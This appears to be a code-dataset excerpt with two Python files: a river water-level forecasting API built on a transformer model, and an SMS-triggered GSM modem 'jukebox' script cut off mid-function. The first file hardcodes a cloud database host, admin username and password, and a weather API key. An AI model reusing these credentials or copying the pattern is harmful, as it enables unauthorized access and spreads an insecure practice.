+{"seq_id":"5293825529","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport calendar\nimport math\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport scipy as sc\nfrom sklearn.preprocessing import MinMaxScaler\nfrom skimage.measure import block_reduce\nfrom sklearn.metrics import mean_absolute_error\nimport io\nimport requests\nfrom metpy.calc import specific_humidity_from_dewpoint\nfrom metpy.units import units\n\nimport mysql.connector\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine\n\nmydb = mysql.connector.connect(\nhost=\"database-1.cccp1zhjxtzi.ap-southeast-1.rds.amazonaws.com\",\nuser=\"admin\",\npassword=\"Nath1234\",\ndatabase= \"rivercast\"\n)\n\nclass initiate_model():\n #IMPORTING\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') # configure GPU utilization\n device\n\n mydb._open_connection()\n query = \"SELECT * FROM rivercast.modelData;\"\n result_dataFrame = pd.read_sql(query, mydb)\n\n print(result_dataFrame.tail(10))\n\n # Specify the column to exclude (change 'column_to_exclude' to the actual column name)\n column_to_exclude = 'Date_Time'\n\n # Exclude the specified column\n df = result_dataFrame.drop(column_to_exclude, axis=1, errors='ignore')\n\n # Print the DataFrame without the excluded column\n\n # Now 'df' can be used as 'mainDataToDB' or for further processing\n\n # convert month name to integer\n\n # create datetime column\n df[['Year', 'Month', 'Day', 'Hour']] = df[['Year', 'Month', 'Day', 'Hour']].astype(int)\n df['Hour'] = df['Hour'].apply(lambda x: x if x < 24 else 0)\n\n # convert year, month, day, and hour columns into timestamp\n df['Datetime'] = df[['Year', 'Month', 'Day', 'Hour']].apply(lambda row: datetime(row['Year'], row['Month'], row['Day'], row['Hour']).isoformat(), axis=1)\n df[\"Datetime\"] = pd.to_datetime(df[\"Datetime\"], format='ISO8601')\n\n # assign timestamps as the data frame index\n df.index = df[\"Datetime\"]\n df = df.drop(['Datetime'], axis=1)\n\n # select the parameters\n df = df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3', 'RF-Intensity', 'RF-Intensity.1', 'RF-Intensity.2', 'RF-Intensity.3', 'Precipitation', 'Precipitation.1', 'Precipitation.2', 'Humidity', 'Humidity.1', 'Humidity.2', 'Temperature', 'Temperature.1', 'Temperature.2']] \n df = df.astype(np.float64) # convert parameters into a double precision floating number\n\n # fill in missing values using linear interpolation\n df = df.interpolate(method='linear', limit_direction='forward')\n df = df.resample('6H').max() # resample dataset using the max value for each 24-hours\n df = df.rolling(120).mean().dropna() # perform moving average smoothing\n\n\n rawData = df\n\n # scale data\n scaler = MinMaxScaler()\n scaler.fit(df)\n # train label scaler\n label_scaler = MinMaxScaler()\n label_scaler.fit(df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3']])\n\n scaled_ds = scaler.transform(df)\n df = pd.DataFrame(scaled_ds, columns=df.columns, index=df.index)\n\n #PCA AND EUCLIDEAN KERNEL\n\n # center data\n rainfall_df = df[['RF-Intensity', 'RF-Intensity.1', 'RF-Intensity.2', 'RF-Intensity.3']]\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(rainfall_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1 / len(rainfall_df.columns)\n K = 
np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n rainfall_df = np.matmul(rainfall_df, eigenvectors) \n rainfall_df = rainfall_df.iloc[:, 1]\n\n # center data\n precipitation_df = df[['Precipitation', 'Precipitation.1', 'Precipitation.2']]\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(precipitation_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(precipitation_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n precipitation_df = np.matmul(precipitation_df, eigenvectors) \n precipitation_df = precipitation_df.iloc[:, 1]\n\n # center data\n humidity_df = df[['Humidity', 'Humidity.1', 'Humidity.2']]\n\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(humidity_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(humidity_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n humidity_df = np.matmul(humidity_df, eigenvectors) \n humidity_df = humidity_df.iloc[:, 1]\n\n # center data\n temp_df = df[['Temperature', 'Temperature.1', 'Temperature.2']]\n\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(temp_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(temp_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n temp_df = np.matmul(temp_df, eigenvectors)\n temp_df = temp_df.iloc[:, 1]\n\n weather_df = pd.concat([rainfall_df, precipitation_df, humidity_df, temp_df], axis=1)\n weather_df.columns = ['Rainfall', 'Precipitation', 'Humidity', 'Temperature']\n\n river_df = df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3']]\n reduced_df = pd.concat([river_df, weather_df], axis=1)\n\n\n\n\n cleanData = reduced_df\n\n\nclass TimeSeriesDataset(torch.utils.data.Dataset):\n def __init__(self, data, seq_len, step):\n self.data = data\n self.seq_len = seq_len\n self.step = step\n \n def __getitem__(self, index):\n in_start = index\n in_end = in_start + self.seq_len\n out_start = index + self.step\n out_end = out_start + self.seq_len\n \n inputs = self.data[in_start:in_end]\n labels = self.data[out_start:out_end]\n \n 
return inputs, labels\n \n def __len__(self):\n return len(self.data) - (self.seq_len + self.step) + 1\n\nBATCH_SIZE = 128\nSEQ_LEN = 180\nSEQ_STEP = 60\nPRED_SIZE = 8\nD_MODEL = 8\nNUM_HEADS = 4\nNUM_LAYERS = 2\nD_FF = 2048 \nDROPOUT = 0.10\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, d_model, num_heads):\n super(MultiHeadAttention, self).__init__()\n assert d_model % num_heads == 0, \"d_model must be divisible by num_heads\"\n \n self.d_model = d_model\n self.num_heads = num_heads\n self.d_k = d_model // num_heads\n \n self.W_q = nn.Linear(d_model, d_model)\n self.W_k = nn.Linear(d_model, d_model)\n self.W_v = nn.Linear(d_model, d_model)\n self.W_o = nn.Linear(d_model, d_model)\n \n def scaled_dot_product_attention(self, Q, K, V, mask=None):\n attn_scores = torch.matmul(Q, K.transpose(-2, -1)) / math.sqrt(self.d_k)\n attn_scores = attn_scores.masked_fill(mask == 0, -1e9)\n \n attn_probs = torch.softmax(attn_scores, dim=-1)\n output = torch.matmul(attn_probs, V)\n \n return attn_probs, output\n \n def split_heads(self, x):\n batch_size, seq_length, d_model = x.size()\n return x.view(batch_size, seq_length, self.num_heads, self.d_k).transpose(1, 2)\n \n def combine_heads(self, x):\n batch_size, _, seq_length, d_k = x.size()\n return x.transpose(1, 2).contiguous().view(batch_size, seq_length, self.d_model)\n \n def forward(self, Q, K, V, mask=None):\n Q = self.split_heads(self.W_q(Q))\n K = self.split_heads(self.W_k(K))\n V = self.split_heads(self.W_v(V))\n \n attn_scores, attn_output = self.scaled_dot_product_attention(Q, K, V, mask)\n output = self.W_o(self.combine_heads(attn_output))\n return attn_scores, output\n \nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_seq_length=2048):\n super(PositionalEncoding, self).__init__()\n \n pe = torch.zeros(max_seq_length, d_model)\n position = torch.arange(0, max_seq_length, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model))\n \n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n \n self.register_buffer('pe', pe.unsqueeze(0))\n \n def forward(self, x):\n return x + self.pe[:, :x.size(1)]\n \nclass PositionWiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff):\n super(PositionWiseFeedForward, self).__init__()\n self.fc1 = nn.Linear(d_model, d_ff)\n self.fc2 = nn.Linear(d_ff, d_model)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.fc2(self.relu(self.fc1(x)))\n \nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, num_heads, d_ff, dropout):\n super(DecoderLayer, self).__init__()\n self.self_attn = MultiHeadAttention(d_model, num_heads)\n self.feed_forward = PositionWiseFeedForward(d_model, d_ff)\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, x, mask=None):\n attn_scores, attn_output = self.self_attn(x, x, x, mask)\n x = self.norm1(x + self.dropout(attn_output))\n ff_output = self.feed_forward(x)\n x = self.norm2(x + self.dropout(ff_output))\n return attn_scores, x\n \nclass Transformer(nn.Module):\n def __init__(self, pred_size, d_model, num_heads, num_layers, d_ff, dropout):\n super(Transformer, self).__init__()\n self.positional_encoding = PositionalEncoding(d_model)\n self.decoder_layers = nn.ModuleList([DecoderLayer(d_model, num_heads, d_ff, dropout) for _ in range(num_layers)])\n self.fc = nn.Linear(d_model, pred_size)\n self.sigmoid = nn.Sigmoid()\n self.dropout = 
nn.Dropout(dropout)\n \n def generate_mask(self, tgt):\n seq_length = tgt.size(1)\n tgt_mask = (1 - torch.triu(torch.ones(1, seq_length, seq_length), diagonal=1)).bool()\n return tgt_mask\n\n def forward(self, tgt):\n mask = self.generate_mask(tgt).to(initiate_model.device)\n tgt_embedded = self.dropout(self.positional_encoding(tgt))\n\n dec_output = tgt_embedded\n for dec_layer in self.decoder_layers:\n attn_scores, dec_output = dec_layer(dec_output, mask)\n\n output = self.sigmoid(self.fc(dec_output))\n return attn_scores, output\n\n# define the model\ndecomposer = Transformer(\n pred_size=PRED_SIZE,\n d_model=D_MODEL,\n num_heads=NUM_HEADS,\n num_layers=NUM_LAYERS,\n d_ff=D_FF,\n dropout=DROPOUT\n).float()\n\ndecomposer.to(initiate_model.device)\n\ndecomposer.load_state_dict(torch.load('transformer.pth'))\n\ndecomposer.eval() # set model on test mode\n\nmydb.close()\n\ndef forecast():\n test_data = initiate_model.reduced_df[-180:].values\n test_dates = initiate_model.reduced_df[-180:].index\n test_dates = test_dates[60:240]\n\n x_test = test_data[:180]\n y_label = test_data[60:]\n y_label = initiate_model.label_scaler.inverse_transform(y_label[:, :4])\n\n x_test = np.reshape(x_test, (1, x_test.shape[0], x_test.shape[1]))\n\n decomposer.eval() # set model on test mode\n\n x_test = torch.from_numpy(x_test).float().to(initiate_model.device)\n attn_scores, y_test = decomposer(x_test) # make forecast\n y_test = y_test.detach().cpu().numpy()\n y_test = np.reshape(y_test, (y_test.shape[1], y_test.shape[2]))\n y_test = initiate_model.label_scaler.inverse_transform(y_test[:, :4])\n\n\n time_steps_per_day = 4 # Assuming 4 time steps per day (6 hours per time step)\n forecast_days = 15\n \n mydb._open_connection()\n cursor = mydb.cursor()\n cursor.execute(\"SELECT DateTime FROM rivercast.rivercast_waterlevel_prediction order by DateTime DESC LIMIT 1\")\n lastPredDT = cursor.fetchone()[0]\n formatted_lastPredDT = lastPredDT.strftime('%Y-%m-%d %H:%M:%S')\n\n # Extract the forecast for the next 15 days\n forecast_values = y_test[:forecast_days * time_steps_per_day]\n\n # Create a DataFrame with the forecasted values and dates\n forecast_dates = pd.date_range(test_dates[-1], periods=forecast_days * time_steps_per_day + 1, freq='6H')[1:]\n forecast_df = pd.DataFrame(data=forecast_values, columns=['P.Waterlevel', 'P.Waterlevel-1', 'P.Waterlevel-2', 'P.Waterlevel-3'])\n forecast_df.insert(0, \"DateTime\", forecast_dates)\n\n matches_and_following_rows_pred = forecast_df[forecast_df['DateTime'] >= formatted_lastPredDT]\n\n\n\n cursor.execute(\"SELECT DateTime FROM rivercast.rivercast_waterlevel_obs order by DateTime DESC LIMIT 1\")\n lastTrueDT = cursor.fetchone()[0] + timedelta(hours=6)\n\n # Extract the forecast for the next 15 days\n true_values = y_label[-120:]\n\n true_dates = pd.date_range(test_dates[-120], periods=120, freq='6H')[:]\n true_df = pd.DataFrame(data=true_values ,columns=['T.Waterlevel', 'T.Waterlevel-1', 'T.Waterlevel-2', 'T.Waterlevel-3']) #converting numpy to dataframe\n true_df.insert(0, \"DateTime\", true_dates) #adding DateTime column\n\n puirpose = pd.DataFrame(data=y_label ,columns=['T.Waterlevel', 'T.Waterlevel-1', 'T.Waterlevel-2', 'T.Waterlevel-3'])\n\n formatted_lastTrueDT = lastTrueDT.strftime('%Y-%m-%d %H:%M:%S')\n\n mydb.close()\n\n matches_and_following_rows = true_df[true_df['DateTime'] >= formatted_lastTrueDT]\n\n return matches_and_following_rows_pred[1:2], matches_and_following_rows\n\n\n\n\ndef getLatest_Datetime():\n mydb._open_connection()\n cursor = 
mydb.cursor()\n\n cursor.execute(\"SELECT Date_Time FROM rivercast.modelData order by Date_Time DESC LIMIT 1\")\n lastDTindex = cursor.fetchone()\n print(lastDTindex)\n\n\n return lastDTindex\n\n\n\ndef updateMainData():\n\n getLatest_Datetime()\n lastDTindexDef = getLatest_Datetime()\n\n ldi = str(lastDTindexDef).replace(\"(datetime.datetime(\", \"\").replace(\"),)\", \"\").replace(\", \", \"-\")\n\n lastDT = datetime.strptime(ldi, '%Y-%m-%d-%H-%M')\n\n\n # Common date calculations\n d = lastDT\n\n h = d.hour\n m = d.minute\n s = d.second\n ms = d.microsecond\n\n dday = d + timedelta(hours=1)\n\n datetoday = dday.strftime(\"%Y-%m-%d:%H\")\n\n startDate = datetoday \n\n ed = datetime.today()\n\n\n edate = ed - timedelta(minutes=m, seconds=s, microseconds=ms) + timedelta(hours=1)\n\n\n endDate = edate.strftime(\"%Y-%m-%d:%H\")\n\n # Weather data\n weatherbit = f'https://api.weatherbit.io/v2.0/history/hourly?lat=14.679696901082357&lon=121.10970052493437&start_date={startDate}&end_date={endDate}&tz=local&key=2b382660ad4843188647514206bf330e'\n wbRes = requests.get(weatherbit)\n wbReq = wbRes.json()\n print(startDate, endDate)\n try:\n wbReq = wbRes.json()\n wbitArr = []\n\n for current_weather in wbReq['data']:\n time_date = current_weather['timestamp_local']\n dpt = current_weather['dewpt']\n prsr = current_weather['pres']\n preci = current_weather['precip']\n temperature = current_weather['temp']\n humi = specific_humidity_from_dewpoint(prsr * units.hPa, dpt * units.degC).to('g/kg')\n \n strHumi = str(humi)\n humidity = strHumi.replace(\" gram / kilogram\", \"\")\n\n wbitArr.append({\n \"humidity\": humidity,\n \"precipitation\": preci,\n \"temperature\": temperature\n })\n\n weather_df = pd.DataFrame(wbitArr)\n\n weather_df['temperature1'] = weather_df['temperature'].copy()\n weather_df['humidity1'] = weather_df['humidity'].copy()\n weather_df['precipitation1'] = weather_df['precipitation'].copy()\n\n weather_df['temperature2'] = weather_df['temperature'].copy()\n weather_df['humidity2'] = weather_df['humidity'].copy()\n weather_df['precipitation2'] = weather_df['precipitation'].copy()\n\n weather_df = weather_df.reindex(columns=['humidity', 'precipitation', 'temperature', 'temperature1', 'humidity1', 'precipitation1', 'temperature2', 'humidity2', 'precipitation2'])\n\n except KeyError:\n print(\"Data are up-to-date\")\n weather_df = pd.DataFrame()\n\n # Water level data\n wlArr = []\n\n base_url = 'http://121.58.193.173:8080/water/map_list.do?ymdhm='\n obsnm_list = [\"Nangka\", \"Sto Nino\", \"Montalban\"]\n\n\n start_date = datetime(dday.year, dday.month, dday.day, dday.hour)\n end_date = datetime(edate.year, edate.month, edate.day, edate.hour)\n current_date = start_date\n\n\n try:\n for current_date in pd.date_range(start=start_date, end=end_date, freq='H'):\n formatted_date = current_date.strftime('%Y%m%d%H%M')\n url = f\"{base_url}{formatted_date}\"\n\n try:\n response = requests.get(url)\n data = response.json()\n\n entry_data = {}\n \n for entry in data:\n for i, obsnm in enumerate(obsnm_list, start=1):\n \n if obsnm in entry['obsnm']:\n year = int(formatted_date[:4])\n month = int(formatted_date[4:6])\n day = int(formatted_date[6:8])\n hour = int(formatted_date[8:10])\n waterlevel = entry.get('wl', 'null')\n \n # Remove \"(*)\" from waterlevel\n waterlevel = waterlevel.replace(\"(*)\", \"\")\n\n entry_data.update({\n \"date_time\": pd.to_datetime(f\"{year}-{month:02d}-{day:02d} {hour:02d}:00:00\"), # Create Date_Time column\n f\"station{i}\": entry['obsnm'],\n f\"year{i}\": 
year,\n f\"month{i}\": month,\n f\"day{i}\": day,\n f\"hour{i}\": hour,\n f\"waterlevel{i}\": waterlevel\n })\n wlArr.append(entry_data)\n\n except Exception as e:\n print(f\"No waterlevel fetched for {formatted_date}: {e}\")\n\n except KeyError:\n print(\"Water level data are up-to-date\")\n waterlevel_df = pd.DataFrame()\n\n waterlevel_df = pd.DataFrame(wlArr)\n\n # Check if 'waterlevel2' column exists before trying to access it\n if 'waterlevel2' in waterlevel_df.columns:\n waterlevel_df['waterlevel2dup'] = waterlevel_df['waterlevel2'].copy()\n else:\n print(\"Data are up-to-date\")\n\n waterlevel_df = waterlevel_df.reindex(columns=['station1', 'year1', 'month1', 'day1', 'hour1','waterlevel1', 'station2', 'year2', 'month2', 'day2', 'hour2','waterlevel2', 'waterlevel2dup', 'station3', 'year3', 'month3', 'day3', 'hour3','waterlevel3','date_time'])\n\n waterlevel_df = waterlevel_df.rename(columns={\"station1\": \"station_1\",\"station2\": \"station_2\"})\n\n\n # Rainfall data\n wlArr = []\n\n base_url = 'http://121.58.193.173:8080/rainfall/map_list.do?ymdhm='\n obsnm_list = [\"Nangka\", \"Mt. Oro\"]\n\n current_date = start_date\n\n try:\n for current_date in pd.date_range(start=start_date, end=end_date, freq='H'):\n formatted_date = current_date.strftime('%Y%m%d%H%M')\n url = f\"{base_url}{formatted_date}\"\n\n try:\n response = requests.get(url)\n data = response.json()\n\n entry_data = {}\n\n for entry in data:\n for i, obsnm in enumerate(obsnm_list, start=1):\n if obsnm in entry['obsnm']:\n rainfall = entry.get('rf', 'null')\n \n # Remove \"(*)\" from rainfall\n rainfall = rainfall.replace(\"(*)\", \"\")\n\n entry_data.update({\n f\"station{i}\": entry['obsnm'],\n f\"rainfall{i}\": rainfall,\n \"date_time\": current_date # Use current_date instead of start_date\n })\n\n wlArr.append(entry_data)\n\n except Exception as e:\n print(f\"No rainfall data fetched for {formatted_date}: {e}\")\n\n except KeyError:\n print(\"Rainfall data are up-to-date\")\n rainfall_df = pd.DataFrame()\n\n rainfall_df = pd.DataFrame(wlArr)\n\n # Check if 'rainfall1' column exists before trying to access it\n if 'rainfall1' in rainfall_df.columns:\n rainfall_df['rainfall1dup'] = rainfall_df['rainfall1']\n else:\n print(\"Data are up-to-date\")\n updatedData = \"\"\n # Similarly, check for 'rainfall2' column\n if 'rainfall2' in rainfall_df.columns:\n rainfall_df['rainfall2dup'] = rainfall_df['rainfall2']\n else:\n updatedData = \"Data are up-to-date\"\n\n rainfall_df = rainfall_df.reindex(columns=['station1', 'rainfall1', 'rainfall1dup', 'station2', 'rainfall2', 'rainfall2dup'])\n\n\n # Consolidate all data into one DataFrame\n merged_df = pd.concat([waterlevel_df, rainfall_df, weather_df], axis=1).dropna()\n\n\n # Assuming your DataFrame is called merged_df\n new_columns = {\n 'station_1': 'Station',\n 'year1': 'Year',\n 'month1': 'Month',\n 'day1': 'Day',\n 'hour1': 'Hour',\n 'waterlevel1': 'Waterlevel',\n 'station_2': 'Station.1',\n 'year2': 'Year.1',\n 'month2': 'Month.1',\n 'day2': 'Day.1',\n 'hour2': 'Hour.1',\n 'waterlevel2': 'Waterlevel.1',\n 'waterlevel2dup': 'Waterlevel.2',\n 'station3': 'Station.2',\n 'year3': 'Year.2',\n 'month3': 'Month.2',\n 'day3': 'Day.2',\n 'hour3': 'Hour.2',\n 'waterlevel3': 'Waterlevel.3',\n 'station1': 'RF-Station',\n 'rainfall1': 'RF-Intensity',\n 'rainfall1dup': 'RF-Intensity.1',\n 'station2': 'RF-Station.1',\n 'rainfall2': 'RF-Intensity.2',\n 'rainfall2dup': 'RF-Intensity.3',\n 'humidity': 'Humidity',\n 'precipitation': 'Precipitation',\n 'temperature': 'Temperature',\n 
'temperature1': 'Temperature.1',\n 'humidity1': 'Humidity.1',\n 'precipitation1': 'Precipitation.1',\n 'temperature2': 'Temperature.2',\n 'humidity2': 'Humidity.2',\n 'precipitation2': 'Precipitation.2',\n 'date_time': 'Date_Time'\n }\n\n merged_df.rename(columns=new_columns, inplace=True)\n\n\n # Save to CSV\n merged_df.to_csv('consolidated_data.csv', index=False)\n mydb.close()\n\n return merged_df, updatedData\n\n\n\n\ndef getAttnScores():\n test_data = initiate_model.reduced_df['2023-09-27':].values\n test_dates = initiate_model.reduced_df['2023-09-27':].index\n test_dates = test_dates[60:240]\n\n x_test = test_data[:180]\n y_label = test_data[60:180]\n y_label = initiate_model.label_scaler.inverse_transform(y_label[:, :4])\n\n x_test = np.reshape(x_test, (1, x_test.shape[0], x_test.shape[1]))\n\n decomposer.eval() # set model on test mode\n\n x_test = torch.from_numpy(x_test).float().to(initiate_model.device)\n attn_scores, y_test = decomposer(x_test) # make forecast\n y_test = y_test.detach().cpu().numpy()\n y_test = np.reshape(y_test, (y_test.shape[1], y_test.shape[2]))\n y_test = initiate_model.label_scaler.inverse_transform(y_test[:, :4])\n\n # plot predictions\n for i in [0, 1, 2, 3]:\n plt.plot(np.convolve(y_test[:, i], np.ones(30), 'valid') / 30)\n plt.plot(y_label[30:, i], color='k', alpha=0.3)\n plt.show()\n\n # plot attention scores\n attn_scores = torch.squeeze(attn_scores, dim=0)\n attn_scores = attn_scores.detach().cpu().numpy() # transfer output from GPU to CPU\n \n \n attention_score_images = []\n\n for idx, attention in enumerate(attn_scores):\n selected_attention = attention[10:]\n selected_attention = block_reduce(selected_attention, (15, 15), np.max)\n\n fig, ax = plt.subplots()\n ax.matshow(selected_attention, cmap='viridis')\n\n # Save the plot to a BytesIO object\n image_stream = io.BytesIO()\n plt.savefig(image_stream, format='png')\n image_stream.seek(0)\n\n # Append the image stream to the list\n attention_score_images.append(image_stream)\n\n # Return the list of attention score images\n return attention_score_images","repo_name":"hephaestus25/ModelAPI","sub_path":"RiverCastAPI/rivercastModel.py","file_name":"rivercastModel.py","file_ext":"py","file_size_in_byte":25791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40947093682","text":"from __future__ import print_function\nimport logging\nimport serial\nimport serial.threaded\nimport threading\nimport time\nimport re\nimport os\nimport sys\nfrom messaging.sms import SmsDeliver, SmsSubmit\nfrom enum import Enum\n\nif os.name == 'posix' and sys.version_info[0] < 3:\n\timport subprocess32 as subprocess\nelse:\n import subprocess\n\ntry:\n\timport queue\nexcept ImportError:\n\timport Queue as queue\n\nclass ATException(Exception):\n\tpass\n\nclass Status(Enum):\n\tIDLE = 0\n\tINCOMING_SMS = 1\n\tACTIVE_CALL = 2\n\tINCOMING_CALL = 3\n\ndef print_dbg(*args):\n\tprint(*args) # uncomment do enable debug\n\treturn\n\nclass WurlitzerProtocol(serial.threaded.LineReader):\n\n\tTERMINATOR = b'\\r\\n'\n\tCLCC_REGEX = re.compile(r'\\+CLCC: (\\d),(\\d),(\\d),(\\d),(\\d),\"(.+)\",(\\d{1,3}),\"(.*)\"')\n\tCALL_STATES = ['BUSY', 'RING', 'NO CARRIER', 'NO ANSWER', 'NO DIALTONE']\n\n\tdef __init__(self):\n\t\tsuper(WurlitzerProtocol, self).__init__()\n\t\tself.alive = True\n\t\tself.playlist = {}\n\t\tself.status = Status.IDLE\n\t\tself.responses = queue.Queue()\n\t\tself.events = queue.Queue()\n\t\tself.clcc_outgoing = queue.Queue()\n\t\tself.clcc_incoming = queue.Queue()\n\t\tself._event_thread = threading.Thread(target=self.__run_event)\n\t\tself._event_thread.daemon = True\n\t\tself._event_thread.name = \"wrlz-event\"\n\t\tself._event_thread.start()\n\t\tself.lock = threading.Lock()\n\n\tdef stop(self):\n\t\tself.alive = False\n\t\tself.events.put(None)\n\t\tself.responses.put('')\n\n\tdef __run_event(self):\n\t\twhile self.alive:\n\t\t\ttry:\n\t\t\t\tself.__handle_event(self.events.get())\n\t\t\texcept:\n\t\t\t\tlogging.exception('_run_event')\n\n\tdef init_module(self):\n\t\tself.command('ATE0')\t\t# disable echo\n\t\tself.command('AT+CFUN=1')\t# enable full functionality\n\t\tself.command('AT+COLP=0')\t# do not block on ATD...\n\t\tself.command('AT+CLCC=1')\t# report state of current calls\n\t\tself.command('AT+CLIP=0')\t# do not indicate incomming call via '+CLIP:...'\n\t\tself.command('AT+CMGF=0')\t# enable PDU mode for SMS\n\t\tself.command('AT+CNMI=2,2')\t# handle SMS directly via '+CMT:...'\n\n\tdef load_playlist(self, path):\n\t\twith open(path) as f:\n \t\t\tself.playlist = dict(l.rstrip().split(None, 1) for l in f)\n\n\tdef handle_line(self, line):\n\t\tprint_dbg('INPUT: ', line)\n\t\tif self.status == Status.INCOMING_SMS:\n\t\t\tself.events.put(line)\n\t\t\treturn\n\n\t\tclcc_match = self.CLCC_REGEX.match(line)\n\t\tif clcc_match != None and clcc_match.group(2) == '0':\n\t\t\t# outgoing call\n\t\t\tself.clcc_outgoing.put(line)\n\t\telif clcc_match != None and clcc_match.group(2) == '1': \n\t\t\t# incoming call\n\t\t\tself.clcc_incoming.put(line)\n\t\telif line.startswith('+CMT'):\n\t\t\t# set status; next line is PDU\n\t\t\tself.status = Status.INCOMING_SMS\n\t\telif line.startswith('+CMGS'):\n\t\t\t# last sent SMS-identifier\n\t\t\tself.responses.put(line);\n\t\telif line in self.CALL_STATES:\n\t\t\tprint_dbg('ignore call state: ', line)\n\t\telif line.startswith('+'):\n\t\t\tself.events.put(line)\n\t\telse:\n\t\t\tself.responses.put(line)\n\n\tdef __handle_event(self, event):\n\t\tprint_dbg('event received:', event)\n\t\tif self.status == Status.INCOMING_SMS:\n\t\t\tself.status = Status.IDLE\n\t\t\tself.__handle_sms(event)\n\n\tdef __handle_sms(self, pdu):\n\t\tsms = SmsDeliver(pdu)\n\t\tprint_dbg('SMS from:', sms.number, 'text:', sms.text);\n\t\tcmd = sms.text.split(None, 1)[0] # only use first word\n\t\tif cmd in 
self.playlist.keys():\n\t\t\tsong = self.playlist.get(cmd)\n\t\t\tprint_dbg('PLAY: ', cmd)\n\t\t\tself.__place_call(sms.number, song)\n\t\telse:\n\t\t\tprint_dbg('SEND PLAYLIST')\n\t\t\tresponse = SmsSubmit(sms.number, 'Select song:\\n> ' + '\\n> '.join(self.playlist.keys()))\n\t\t\tfor resp_pdu in response.to_pdu():\n\t\t\t\tprint_dbg('RESP:', resp_pdu.pdu)\n\t\t\t\t# cannot wait for response '> ' due to missing '\\r'\n\t\t\t\tself.command(b'AT+CMGS=%d' % resp_pdu.length, None)\n\t\t\t\ttime.sleep(1) # just wait 1sec instead\n\t\t\t\tself.command(b'%s\\x1a' % resp_pdu.pdu)\n\n\tdef __place_call(self, number, song):\n\t\tprint_dbg('Calling: ', number)\n\t\tself.command('ATD%s;' % number)\n\t\tcall_state = 'CALLING'\n\t\ttimeout_cnt = 3\n\t\tplayer = None\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tclcc = self.clcc_outgoing.get(timeout = 10)\n\t\t\t\tprint_dbg('CLCC: ', clcc)\n\t\t\t\tstatus = self.CLCC_REGEX.match(clcc).group(3)\n\t\t\t\tif status == '0': # ACTIVE\n\t\t\t\t\tprint_dbg('ACTIVE')\n\t\t\t\t\tcall_state = 'PLAYING'\n\t\t\t\t\tplayer = subprocess.Popen(['mpg123', '-q', song])\n\t\t\t\t\tprint_dbg('PLAYING: ', song)\n\t\t\t\telif status == '2': # DAILING\n\t\t\t\t\tprint_dbg('DAILING')\n\t\t\t\telif status == '3': # ALERTING (ring?)\n\t\t\t\t\tprint_dbg('ALERTING')\n\t\t\t\telif status == '6': # DISCONNECT\n\t\t\t\t\tprint_dbg('DISCONNECT')\n\t\t\t\t\tif player != None:\n\t\t\t\t\t\tplayer.kill()\n\t\t\t\t\treturn\n\t\t\texcept queue.Empty:\n\t\t\t\tprint_dbg('queue empty')\n\t\t\t\tif call_state == 'CALLING':\n\t\t\t\t\ttimeout_cnt -= 1\n\t\t\t\t\tprint_dbg('TIMEOUT ', timeout_cnt)\n\t\t\t\telif call_state == 'PLAYING':\n\t\t\t\t\tif 